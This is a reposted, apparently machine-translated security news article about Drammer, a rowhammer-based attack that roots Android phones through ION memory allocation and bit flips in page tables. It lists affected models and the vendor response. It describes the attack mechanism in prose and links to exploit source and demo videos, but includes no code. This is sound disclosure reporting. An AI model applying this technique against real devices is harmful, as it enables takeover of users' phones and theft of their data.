Hacking Book | Free Online Hacking Learning


how to exploit rowhammer vulnerability root android mobile phone (including demo video + exploit source code)

Posted by graebner at 2020-02-27

Recently, security experts have found a new way to root Android phones through research, that is, root Android phones through the rowhammer vulnerability. In addition, the attacker can even use this vulnerability in combination with currently known Android system vulnerabilities (bandroid and stagefright) to attack the target user.

At the beginning of last year, security research experts of Google's Project Zero team found that an attacker could hijack a computer with a Linux system installed through a design defect in memory and obtain advanced permissions of the target system kernel. Now, attackers can use this design flaw to root thousands of Android phones.

Before that, researchers from the vusec security laboratory at the Free University of Amsterdam found an attack called rowhammer, which can be used to attack the dynamic random access memory (DRAM) of the target device. Although we are already familiar with the rowhammer attack, this is the first time that security experts have applied it to mobile devices.

What is the rowhammer attack on DRAM?

Rowhammer attacks on mobile devices are also very destructive. Before Google develops a corresponding patch, this problem will put the important data in millions of Android phones at risk.

When an attacker attempts to launch a rowhammer attack, he needs to execute a malware to repeatedly access a row of transistors in the memory chip, and the second step of the attack is called "hammering". When malware "knocks" a block of memory, it will affect adjacent memory lines and cause charge leakage. This kind of electromagnetic interference will eventually lead to bit reversal of other lines of memory data. In this case, the data in memory will be changed, and this becomes a new way to obtain control of the device.

In short, rowhammer attack refers to repeatedly accessing a row of memory on a new generation of DRAM chip, and this operation may cause bit flipping of data in adjacent memory rows. This attack technology will allow anyone to modify the data content stored in the device memory.

The project zero team wrote in its published research report:

"Now the manufacturing accuracy of DRAM is higher and higher, and the components are smaller and smaller on the physical level. Therefore, it is very difficult for manufacturers to integrate more memory capacity on one chip and avoid electromagnetic interference between memory units. The consequence of this situation is that the reading and writing of a single area of memory may interfere with the adjacent memory area, resulting in the current flowing into or out of the adjacent memory unit. If a large number of read and write operations are repeated, it is possible to change the contents of adjacent memory units so that the original bit data 0 becomes 1, or 1 becomes 0. "

Will your Android phone be affected?

In order to test rowhammer attacks on Android phones, security experts have built a new vulnerability exploit POC, namely drammer. Through testing, it is found that this new vulnerability exploitation method can not only successfully modify the data in many popular mobile phones, but also successfully root these Android phones.

The Android phones that the researchers succeeded in root include Google's nexus 4 and nexus 5, LG's G4, Samsung's Galaxy S4 and Galaxy S5, Motorola's motog (2013 / 2014), and domestic one plus phones. But there are other brands of Android phones that will also be affected by the drammer attack.

The security research expert wrote in the test report [PDF]:

"The drammer attack we have designed proves that rowhammer attack is a real security threat for billions of mobile users. Moreover, our experiment also shows that rowhammer attack can not only invade X86 platform, but also be applied to mobile devices. "

Working mechanism of drammer attack

In order to exploit this vulnerability, security researchers have developed a malicious software, which contains the corresponding exploit code (see the link at the end of the article). In order to avoid being detected by anti-virus software, this malicious software does not need to obtain any special user rights to root the target mobile phone. However, in order to successfully execute the drammer attack, we have to let users download the malware containing the exploit code.

In order to attack, researchers also need to obtain direct access to DRAM through a mechanism called "ion memory allocation / management" in Android system. In addition to providing direct access to DRAM for every application, ion memory manager can also allow applications to identify the memory space of adjacent rows of DRAM, which is also an important premise for memory data to flip bit.

With this information, researchers will have to figure out how to use "bit flip" to root the target device. After obtaining the full control of the target mobile phone, they can extract any data from the target mobile phone.

Security researchers said:

"In short, our attack method is to make the physical memory allocator work by exhausting memory blocks of different sizes. In this state, it will use the predictable memory area to fill the exhausted memory space. Next, we can control the memory allocator to transfer sensitive data (such as a memory page table) from the target device to a physical memory that is easy to flip bits. In this way, we can attack through drammer. "

When the target device downloads and installs our malware, the drammer exploit code will connect the target mobile phone in a few minutes (sometimes only a few seconds), and the whole process does not require any user interaction. Even when you're using another app or turning your phone to sleep mode, the attack doesn't stop.

There is no feasible solution at present

Security experts have submitted information about the vulnerability to Google in July this year. Google has classified the vulnerability as a "high-risk vulnerability," and according to the vulnerability reward program, Google has offered the research experts a $4000 vulnerability reward.

Google said it notified the relevant partners when it obtained detailed information about the vulnerability. In November's security update announcement, Google will provide users with a solution that can mitigate the drammer attack.

But security researchers warn that the memory chips of Android smartphones in the hands of users can not be replaced, so this security problem will not be completely fixed in a short time. In addition, the drammer attack will take advantage of other basic functions in the operating system. If these basic functions are to be removed or modified, the user experience will be greatly reduced. In short, the next generation of Android smartphones is hard to fix.

Attack demo + vulnerability POC

A total of two POC videos have been released by security research experts, in which they demonstrate how to conduct drammer attacks on lgnexus 5.

In the first video, Android 6.0.1 is running on the test phone, and the security patch released by Google on October 5 is installed.

In the second video, the researchers demonstrate how to use the stagefright vulnerability in combination with the drammer attack to invade some old Android phones without patches.

Security researchers demonstrated the drummer attack against Android 6.0.1:

Stagefright + drammer attack demo video:

Exploit source code: exploit source code

*Reference source: the hackernews, softmedia, FB editor alpha ﹐ h4ck compilation, reprint please indicate from freebuf.com